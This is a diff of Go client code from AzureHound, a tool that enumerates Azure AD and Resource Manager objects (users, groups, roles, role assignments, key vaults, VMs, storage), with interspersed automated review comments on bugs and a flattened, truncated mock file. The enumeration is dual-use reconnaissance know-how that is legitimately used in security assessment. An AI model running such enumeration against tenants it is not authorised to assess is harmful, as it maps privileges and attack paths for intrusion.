+ if req, err := rest.NewRequest(ctx, "GET", nextUrl, nil, paramsMap, nil); err != nil {
+ errResult.Error = err
+ _ = pipeline.Send(ctx.Done(), out, errResult)
+ return
+ } else if res, err = client.Send(req); err != nil {
+ errResult.Error = err
+ _ = pipeline.Send(ctx.Done(), out, errResult)
+ return
+ }
+ }
+ } else {
+ if res, err = client.Get(ctx, path, params, nil); err != nil {
+ errResult.Error = err
+ _ = pipeline.Send(ctx.Done(), out, errResult)
+ return
+ }
+ }
+
+ if err := rest.Decode(res.Body, &list); err != nil {
+ errResult.Error = err
+ _ = pipeline.Send(ctx.Done(), out, errResult)
+ return
+ } else {
+ for _, u := range list.Value {
+ if ok := pipeline.Send(ctx.Done(), out, AzureResult[T]{Ok: u}); !ok {
+ return
+ }
+ }
+ }
+
+ if list.NextLinkRM == "" && list.NextLinkGraph == "" {
+ break
+ } else if list.NextLinkGraph != "" {
+ nextLink = list.NextLinkGraph
+ } else if list.NextLinkRM != "" {
+ nextLink = list.NextLinkRM
+ }
+ }
+}
+
+type azureClient struct {
+ msgraph rest.RestClient
+ resourceManager rest.RestClient
+ tenant azure.Tenant
+}
+
+type AzureGraphClient interface {
+ GetAzureADOrganization(ctx context.Context, selectCols []string) (*azure.Organization, error)
+
+ ListAzureADGroups(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.Group]
+ ListAzureADGroupMembers(ctx context.Context, objectId string, params query.GraphParams) <-chan AzureResult[json.RawMessage]
+ ListAzureADGroupOwners(ctx context.Context, objectId string, params query.GraphParams) <-chan AzureResult[json.RawMessage]
+ ListAzureADAppOwners(ctx context.Context, objectId string, params query.GraphParams) <-chan AzureResult[json.RawMessage]
+ ListAzureADApps(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.Application]
+ ListAzureADUsers(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.User]
+ ListAzureADRoleAssignments(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.UnifiedRoleAssignment]
+ ListAzureADRoles(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.Role]
+ ListAzureADServicePrincipalOwners(ctx context.Context, objectId string, params query.GraphParams) <-chan AzureResult[json.RawMessage]
+ ListAzureADServicePrincipals(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.ServicePrincipal]
+ ListAzureDeviceRegisteredOwners(ctx context.Context, objectId string, params query.GraphParams) <-chan AzureResult[json.RawMessage]
+ ListAzureDevices(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.Device]
+ ListAzureADAppRoleAssignments(ctx context.Context, servicePrincipalId string, params query.GraphParams) <-chan AzureResult[azure.AppRoleAssignment]
+}
+
+type AzureResourceManagerClient interface {
+ GetAzureADTenants(ctx context.Context, includeAllTenantCategories bool) (azure.TenantList, error)
+
+ ListRoleAssignmentsForResource(ctx context.Context, resourceId string, filter, tenantId string) <-chan AzureResult[azure.RoleAssignment]
+ ListAzureADTenants(ctx context.Context, includeAllTenantCategories bool) <-chan AzureResult[azure.Tenant]
+ ListAzureContainerRegistries(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.ContainerRegistry]
+ ListAzureWebApps(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.WebApp]
+ ListAzureManagedClusters(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.ManagedCluster]
+ ListAzureVMScaleSets(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.VMScaleSet]
+ ListAzureKeyVaults(ctx context.Context, subscriptionId string, params query.RMParams) <-chan AzureResult[azure.KeyVault]
+ ListAzureManagementGroups(ctx context.Context, skipToken string) <-chan AzureResult[azure.ManagementGroup]
+ ListAzureManagementGroupDescendants(ctx context.Context, groupId string, top int32) <-chan AzureResult[azure.DescendantInfo]
+ ListAzureResourceGroups(ctx context.Context, subscriptionId string, params query.RMParams) <-chan AzureResult[azure.ResourceGroup]
+ ListAzureSubscriptions(ctx context.Context) <-chan AzureResult[azure.Subscription]
+ ListAzureVirtualMachines(ctx context.Context, subscriptionId string, params query.RMParams) <-chan AzureResult[azure.VirtualMachine]
+ ListAzureStorageAccounts(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.StorageAccount]
+ ListAzureStorageContainers(ctx context.Context, subscriptionId string, resourceGroupName string, saName string, filter string, includeDeleted string, maxPageSize string) <-chan AzureResult[azure.StorageContainer]
+ ListAzureAutomationAccounts(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.AutomationAccount]
+ ListAzureLogicApps(ctx context.Context, subscriptionId string, filter string, top int32) <-chan AzureResult[azure.LogicApp]
+ ListAzureFunctionApps(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.FunctionApp]
+}
+
+type AzureClient interface {
+ AzureGraphClient
+ AzureResourceManagerClient
+
+ TenantInfo() azure.Tenant
+ CloseIdleConnections()
+}
+
+func (s azureClient) TenantInfo() azure.Tenant {
+ return s.tenant
+}
+
+func (s azureClient) CloseIdleConnections() {
+ s.msgraph.CloseIdleConnections()
+ s.resourceManager.CloseIdleConnections()
+}
diff --git a/client/config/config.go b/client/config/config.go
new file mode 100644
index 0000000..3b68c1a
--- /dev/null
+++ b/client/config/config.go
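Review bot: initClientViaRM uses the JWT claim as `tid.(string)` with no check, and `tid` is `body["tid"]` from the caller-supplied token, so a token without a string `tid` claim panics instead of returning an error. The same function returns `client, nil` when no tenant in the result matches, leaving `client.tenant` at its zero value; the excerpt below validates the claim up front and turns the no-match case into an error. In getAzureObjectList the follow-up URL is taken from `@odata.nextLink`/`nextLink` in the response body; if `client.Send` attaches the bearer token (not visible in this hunk), comparing `nextUrl.Host` with the configured endpoint before sending would keep the token from leaving that host. `res.Body` is also never closed inside the loop unless `rest.Decode` does it, which cannot be confirmed from here.

```go
func initClientViaRM(msgraph, resourceManager rest.RestClient, tid interface{}) (AzureClient, error) {
	// Validate the claim before use: it originates from the supplied JWT.
	tenantID, ok := tid.(string)
	if !ok || tenantID == "" {
		return nil, fmt.Errorf("token has no usable tid claim")
	}
	// … unchanged: azureClient construction and GetAzureADTenants call …
		for _, tenant := range result.Value {
			if tenant.TenantId == tenantID {
				client.tenant = tenant
				return client, nil
			}
		}
		// No accessible tenant matched the token's tid; do not hand back a half-initialised client.
		return nil, fmt.Errorf("tenant %q not found among accessible tenants", tenantID)
```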
@@ -0,0 +1,107 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package config
+
+import (
+ "strings"
+
+ "github.com/bloodhoundad/azurehound/v2/constants"
+)
+
+type Config struct {
+ ApplicationId string // The Application Id that the Azure app registration portal assigned when the app was registered.
+ Authority string // The Azure ActiveDirectory Authority URL
+ ClientSecret string // The Application Secret that was generated for the app in the app registration portal.
+ ClientCert string // The certificate uploaded to the app registration portal."
+ ClientKey string // The key for a certificate uploaded to the app registration portal."
+ ClientKeyPass string // The passphrase to use in conjuction with the associated key of a certificate uploaded to the app registration portal."
+ Graph string // The Microsoft Graph URL
+ JWT string // The JSON web token that will be used to authenticate requests sent to Azure APIs
+ Management string // The Azure ResourceManager URL
+ MgmtGroupId []string // The Management Group Id to use as a filter
+ Password string // The password associated with the user principal name associated with the Azure portal.
+ ProxyUrl string // The forward proxy url
+ RefreshToken string // The refresh token that will be used to authenticate requests sent to Azure APIs
+ Region string // The region of the Azure Cloud deployment.
+ SubscriptionId []string // The Subscription Id(s) to use as a filter
+ Tenant string // The directory tenant that you want to request permission from. This can be in GUID or friendly name format
+ Username string // The user principal name associated with the Azure portal.
+}
+
+func AuthorityUrl(region string, defaultUrl string) string {
+ switch region {
+ case constants.China:
+ return constants.AzureChina().ActiveDirectoryAuthority
+ case constants.Cloud:
+ return constants.AzureCloud().ActiveDirectoryAuthority
+ case constants.Germany:
+ return constants.AzureGermany().ActiveDirectoryAuthority
+ case constants.USGovL4:
+ return constants.AzureUSGovernment().ActiveDirectoryAuthority
+ case constants.USGovL5:
+ return constants.AzureUSGovernmentL5().ActiveDirectoryAuthority
+ default:
+ return defaultUrl
+ }
+}
+
+func (s Config) AuthorityUrl() string {
+ return AuthorityUrl(s.Region, s.Authority)
+}
+
+func GraphUrl(region string, defaultUrl string) string {
+ switch region {
+ case constants.China:
+ return constants.AzureChina().MicrosoftGraphUrl
+ case constants.Cloud:
+ return constants.AzureCloud().MicrosoftGraphUrl
+ case constants.Germany:
+ return constants.AzureGermany().MicrosoftGraphUrl
+ case constants.USGovL4:
+ return constants.AzureUSGovernment().MicrosoftGraphUrl
+ case constants.USGovL5:
+ return constants.AzureUSGovernmentL5().MicrosoftGraphUrl
+ default:
+ return defaultUrl
+ }
+}
+
+func (s Config) GraphUrl() string {
+ return strings.TrimSuffix(GraphUrl(s.Region, s.Graph), "/")
+}
+
+func ResourceManagerUrl(region string, defaultUrl string) string {
+ switch region {
+ case constants.China:
+ return constants.AzureChina().ResourceManagerUrl
+ case constants.Cloud:
+ return constants.AzureCloud().ResourceManagerUrl
+ case constants.Germany:
+ return constants.AzureGermany().ResourceManagerUrl
+ case constants.USGovL4:
+ return constants.AzureUSGovernment().ResourceManagerUrl
+ case constants.USGovL5:
+ return constants.AzureUSGovernmentL5().ResourceManagerUrl
+ default:
+ return defaultUrl
+ }
+}
+
+func (s Config) ResourceManagerUrl() string {
+ return strings.TrimSuffix(ResourceManagerUrl(s.Region, s.Graph), "/")
+}
diff --git a/client/container_registries.go b/client/container_registries.go
new file mode 100644
index 0000000..cc7d1ed
--- /dev/null
+++ b/client/container_registries.go
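Review bot: `Config.ResourceManagerUrl()` passes `s.Graph` as the fallback, so whenever the region falls through to `default` the Resource Manager client is pointed at the Graph URL and the `Management` field is never read; the line should be `return strings.TrimSuffix(ResourceManagerUrl(s.Region, s.Management), "/")`. NewClient in client/client.go also compares the token audience against `config.ResourceManagerUrl()`, so with this fallback a JWT issued for the Resource Manager endpoint would match neither branch and be rejected as an invalid audience. Separately, `Config` holds `ClientSecret`, `ClientKeyPass`, `Password`, `JWT` and `RefreshToken` as plain string fields; a struct comment such as `// Config contains credentials; never log it with %v or %+v.` would help keep them out of logs.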
@@ -0,0 +1,39 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// ListAzureContainerRegistries https://learn.microsoft.com/en-us/rest/api/containerregistry/registries/list?view=rest-containerregistry-2023-01-01-preview
+func (s *azureClient) ListAzureContainerRegistries(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.ContainerRegistry] {
+ var (
+ out = make(chan AzureResult[azure.ContainerRegistry])
+ path = fmt.Sprintf("/subscriptions/%s/providers/Microsoft.ContainerRegistry/registries", subscriptionId)
+ params = query.RMParams{ApiVersion: "2023-01-01-preview"}
+ )
+
+ go getAzureObjectList[azure.ContainerRegistry](s.resourceManager, ctx, path, params, out)
+
+ return out
+}
diff --git a/client/devices.go b/client/devices.go
new file mode 100644
index 0000000..d4935a2
--- /dev/null
+++ b/client/devices.go
@@ -0,0 +1,56 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "encoding/json"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// ListAzureDevices https://learn.microsoft.com/en-us/graph/api/device-list?view=graph-rest-1.0
+func (s *azureClient) ListAzureDevices(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.Device] {
+ var (
+ out = make(chan AzureResult[azure.Device])
+ path = fmt.Sprintf("/%s/devices", constants.GraphApiVersion)
+ )
+
+ if params.Top == 0 {
+ params.Top = 999
+ }
+
+ go getAzureObjectList[azure.Device](s.msgraph, ctx, path, params, out)
+
+ return out
+}
+
+// ListAzureDeviceRegisteredOwners https://learn.microsoft.com/en-us/graph/api/device-list-registeredowners?view=graph-rest-beta
+func (s *azureClient) ListAzureDeviceRegisteredOwners(ctx context.Context, objectId string, params query.GraphParams) <-chan AzureResult[json.RawMessage] {
+ var (
+ out = make(chan AzureResult[json.RawMessage])
+ path = fmt.Sprintf("/%s/devices/%s/registeredOwners", constants.GraphApiBetaVersion, objectId)
+ )
+
+ go getAzureObjectList[json.RawMessage](s.msgraph, ctx, path, params, out)
+
+ return out
+}
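Review bot: ListAzureDeviceRegisteredOwners forwards `params` without the `Top` default that ListAzureDevices sets just above it, so the page size for owner listings is whatever the caller happened to pass; ListAzureADGroupMembers in client/groups.go has the same gap next to two siblings that default to 99. If that is intentional, say so in the doc comment, e.g. `// No default page size is applied here; params.Top is sent as provided.` Otherwise add the same `if params.Top == 0 { ... }` guard the sibling methods use so paging behaves uniformly across the client.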
diff --git a/client/function_apps.go b/client/function_apps.go
new file mode 100644
index 0000000..9c924d0
--- /dev/null
+++ b/client/function_apps.go
@@ -0,0 +1,39 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// ListAzureFunctionApps
+func (s *azureClient) ListAzureFunctionApps(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.FunctionApp] {
+ var (
+ out = make(chan AzureResult[azure.FunctionApp])
+ path = fmt.Sprintf("/subscriptions/%s/providers/Microsoft.Web/sites", subscriptionId)
+ params = query.RMParams{ApiVersion: "2022-03-01"}
+ )
+
+ go getAzureObjectList[azure.FunctionApp](s.resourceManager, ctx, path, params, out)
+
+ return out
+}
diff --git a/client/groups.go b/client/groups.go
new file mode 100644
index 0000000..824c8fe
--- /dev/null
+++ b/client/groups.go
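Review bot: The doc comment on ListAzureFunctionApps is only the bare method name, and the request goes to `/providers/Microsoft.Web/sites`, which is the general sites collection rather than anything specific to function apps. If narrowing by site kind is left to the caller, the comment should say so, e.g. `// ListAzureFunctionApps lists Microsoft.Web/sites for the subscription; callers are expected to filter for function apps.` Whether that filtering exists is not visible in this hunk, so it should be confirmed before relying on the result type name.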
@@ -0,0 +1,72 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "encoding/json"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// ListAzureADGroups https://learn.microsoft.com/en-us/graph/api/group-list?view=graph-rest-beta
+func (s *azureClient) ListAzureADGroups(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.Group] {
+ var (
+ out = make(chan AzureResult[azure.Group])
+ path = fmt.Sprintf("/%s/groups", constants.GraphApiVersion)
+ )
+
+ if params.Top == 0 {
+ params.Top = 99
+ }
+
+ go getAzureObjectList[azure.Group](s.msgraph, ctx, path, params, out)
+
+ return out
+}
+
+// ListAzureADGroupOwners https://learn.microsoft.com/en-us/graph/api/group-list-owners?view=graph-rest-beta
+func (s *azureClient) ListAzureADGroupOwners(ctx context.Context, objectId string, params query.GraphParams) <-chan AzureResult[json.RawMessage] {
+ var (
+ out = make(chan AzureResult[json.RawMessage])
+ path = fmt.Sprintf("/%s/groups/%s/owners", constants.GraphApiBetaVersion, objectId)
+ )
+
+ if params.Top == 0 {
+ params.Top = 99
+ }
+
+ go getAzureObjectList[json.RawMessage](s.msgraph, ctx, path, params, out)
+
+ return out
+}
+
+// ListAzureADGroupMembers https://learn.microsoft.com/en-us/graph/api/group-list-members?view=graph-rest-beta
+func (s *azureClient) ListAzureADGroupMembers(ctx context.Context, objectId string, params query.GraphParams) <-chan AzureResult[json.RawMessage] {
+ var (
+ out = make(chan AzureResult[json.RawMessage])
+ path = fmt.Sprintf("/%s/groups/%s/members", constants.GraphApiBetaVersion, objectId)
+ )
+
+ go getAzureObjectList[json.RawMessage](s.msgraph, ctx, path, params, out)
+
+ return out
+}
diff --git a/client/keyvaults.go b/client/keyvaults.go
new file mode 100644
index 0000000..c7735c7
--- /dev/null
+++ b/client/keyvaults.go
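Review bot: ListAzureADGroupMembers passes `params` through without the `if params.Top == 0 { params.Top = 99 }` default that ListAzureADGroups and ListAzureADGroupOwners apply, so the page size for member listings is left to whatever the caller or the service chooses. If that is intentional, a one-line comment saying so would help the next reader; otherwise add the same default before the `go getAzureObjectList` call. Separately, the comment on ListAzureADGroups links the `graph-rest-beta` reference while its path uses `constants.GraphApiVersion` rather than `constants.GraphApiBetaVersion`; the value of that constant is outside this hunk, so confirm which version the link should name.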
@@ -0,0 +1,42 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// ListAzureKeyVaults https://learn.microsoft.com/en-us/rest/api/keyvault/keyvault/vaults/list-by-subscription?view=rest-keyvault-keyvault-2019-09-01
+func (s *azureClient) ListAzureKeyVaults(ctx context.Context, subscriptionId string, params query.RMParams) <-chan AzureResult[azure.KeyVault] {
+ var (
+ out = make(chan AzureResult[azure.KeyVault])
+ path = fmt.Sprintf("/subscriptions/%s/providers/Microsoft.KeyVault/vaults", subscriptionId)
+ )
+
+ if params.ApiVersion == "" {
+ params.ApiVersion = "2019-09-01"
+ }
+
+ go getAzureObjectList[azure.KeyVault](s.resourceManager, ctx, path, params, out)
+
+ return out
+}
diff --git a/client/logic_apps.go b/client/logic_apps.go
new file mode 100644
index 0000000..711bfe2
--- /dev/null
+++ b/client/logic_apps.go
@@ -0,0 +1,39 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// ListAzureLogicApps https://learn.microsoft.com/en-us/rest/api/logic/workflows/list-by-subscription?view=rest-logic-2016-06-01
+func (s *azureClient) ListAzureLogicApps(ctx context.Context, subscriptionId string, filter string, top int32) <-chan AzureResult[azure.LogicApp] {
+ var (
+ out = make(chan AzureResult[azure.LogicApp])
+ path = fmt.Sprintf("/subscriptions/%s/providers/Microsoft.Logic/workflows", subscriptionId)
+ params = query.RMParams{ApiVersion: "2016-06-01", Filter: filter, Top: top}
+ )
+
+ go getAzureObjectList[azure.LogicApp](s.resourceManager, ctx, path, params, out)
+
+ return out
+}
diff --git a/client/managed_clusters.go b/client/managed_clusters.go
new file mode 100644
index 0000000..05c6b19
--- /dev/null
+++ b/client/managed_clusters.go
@@ -0,0 +1,39 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// ListAzureManagedClusters https://learn.microsoft.com/en-us/rest/api/servicefabric/managedclusters/managed-clusters/list-by-subscription?view=rest-servicefabric-managedclusters-2021-07-01
+func (s *azureClient) ListAzureManagedClusters(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.ManagedCluster] {
+ var (
+ out = make(chan AzureResult[azure.ManagedCluster])
+ path = fmt.Sprintf("/subscriptions/%s/providers/Microsoft.ContainerService/managedClusters", subscriptionId)
+ params = query.RMParams{ApiVersion: "2021-07-01"}
+ )
+
+ go getAzureObjectList[azure.ManagedCluster](s.resourceManager, ctx, path, params, out)
+
+ return out
+}
diff --git a/client/management_groups.go b/client/management_groups.go
new file mode 100644
index 0000000..a269b92
--- /dev/null
+++ b/client/management_groups.go
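Review bot: The doc link on ListAzureManagedClusters points at the Service Fabric managed-clusters reference, but the path queries `Microsoft.ContainerService/managedClusters`, which is the AKS resource type. A reader who follows the link to work out the response schema or the permissions the call needs ends up on the wrong provider's documentation. Replace the URL with the Container Service (AKS) managed-clusters list reference, and check that `2021-07-01` is the API version intended for that provider rather than one carried over from the Service Fabric page.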
@@ -0,0 +1,52 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// ListAzureManagementGroups https://learn.microsoft.com/en-us/rest/api/managementgroups/management-groups/list?view=rest-managementgroups-2020-05-01
+func (s *azureClient) ListAzureManagementGroups(ctx context.Context, skipToken string) <-chan AzureResult[azure.ManagementGroup] {
+ var (
+ out = make(chan AzureResult[azure.ManagementGroup])
+ path = "/providers/Microsoft.Management/managementGroups"
+ params = query.RMParams{ApiVersion: "2020-05-01", SkipToken: skipToken}
+ )
+
+ go getAzureObjectList[azure.ManagementGroup](s.resourceManager, ctx, path, params, out)
+
+ return out
+}
+
+// ListAzureManagementGroupDescendants https://learn.microsoft.com/en-us/rest/api/managementgroups/management-groups/get-descendants?view=rest-managementgroups-2020-05-01
+func (s *azureClient) ListAzureManagementGroupDescendants(ctx context.Context, groupId string, top int32) <-chan AzureResult[azure.DescendantInfo] {
+ var (
+ out = make(chan AzureResult[azure.DescendantInfo])
+ path = fmt.Sprintf("/providers/Microsoft.Management/managementGroups/%s/descendants", groupId)
+ params = query.RMParams{ApiVersion: "2020-05-01", Top: top}
+ )
+
+ go getAzureObjectList[azure.DescendantInfo](s.resourceManager, ctx, path, params, out)
+
+ return out
+}
diff --git a/client/mocks/client.go b/client/mocks/client.go
new file mode 100644
index 0000000..97dfeb3
--- /dev/null
+++ b/client/mocks/client.go
@@ -0,0 +1,515 @@ +// Code generated by MockGen. DO NOT EDIT. +// Source: github.com/bloodhoundad/azurehound/v2/client (interfaces: AzureClient) + +// Package mocks is a generated GoMock package. +package mocks + +import ( + "context" + "encoding/json" + "reflect" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +// MockAzureClient is a mock of AzureClient interface. +type MockAzureClient struct { + ctrl *gomock.Controller + recorder *MockAzureClientMockRecorder +} + +// MockAzureClientMockRecorder is the mock recorder for MockAzureClient. +type MockAzureClientMockRecorder struct { + mock *MockAzureClient +} + +// NewMockAzureClient creates a new mock instance. +func NewMockAzureClient(ctrl *gomock.Controller) *MockAzureClient { + mock := &MockAzureClient{ctrl: ctrl} + mock.recorder = &MockAzureClientMockRecorder{mock} + return mock +} + +// EXPECT returns an object that allows the caller to indicate expected use. +func (m *MockAzureClient) EXPECT() *MockAzureClientMockRecorder { + return m.recorder +} + +// CloseIdleConnections mocks base method. +func (m *MockAzureClient) CloseIdleConnections() { + m.ctrl.T.Helper() + m.ctrl.Call(m, "CloseIdleConnections") +} + +// CloseIdleConnections indicates an expected call of CloseIdleConnections. +func (mr *MockAzureClientMockRecorder) CloseIdleConnections() *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CloseIdleConnections", reflect.TypeOf((*MockAzureClient)(nil).CloseIdleConnections)) +} + +// GetAzureADOrganization mocks base method. 
+func (m *MockAzureClient) GetAzureADOrganization(arg0 context.Context, arg1 []string) (*azure.Organization, error) { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "GetAzureADOrganization", arg0, arg1) + ret0, _ := ret[0].(*azure.Organization) + ret1, _ := ret[1].(error) + return ret0, ret1 +} + +// GetAzureADOrganization indicates an expected call of GetAzureADOrganization. +func (mr *MockAzureClientMockRecorder) GetAzureADOrganization(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetAzureADOrganization", reflect.TypeOf((*MockAzureClient)(nil).GetAzureADOrganization), arg0, arg1) +} + +// GetAzureADTenants mocks base method. +func (m *MockAzureClient) GetAzureADTenants(arg0 context.Context, arg1 bool) (azure.TenantList, error) { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "GetAzureADTenants", arg0, arg1) + ret0, _ := ret[0].(azure.TenantList) + ret1, _ := ret[1].(error) + return ret0, ret1 +} + +// GetAzureADTenants indicates an expected call of GetAzureADTenants. +func (mr *MockAzureClientMockRecorder) GetAzureADTenants(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetAzureADTenants", reflect.TypeOf((*MockAzureClient)(nil).GetAzureADTenants), arg0, arg1) +} + +// ListAzureADAppOwners mocks base method. +func (m *MockAzureClient) ListAzureADAppOwners(arg0 context.Context, arg1 string, arg2 query.GraphParams) <-chan client.AzureResult[json.RawMessage] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADAppOwners", arg0, arg1, arg2) + ret0, _ := ret[0].(<-chan client.AzureResult[json.RawMessage]) + return ret0 +} + +// ListAzureADAppOwners indicates an expected call of ListAzureADAppOwners. 
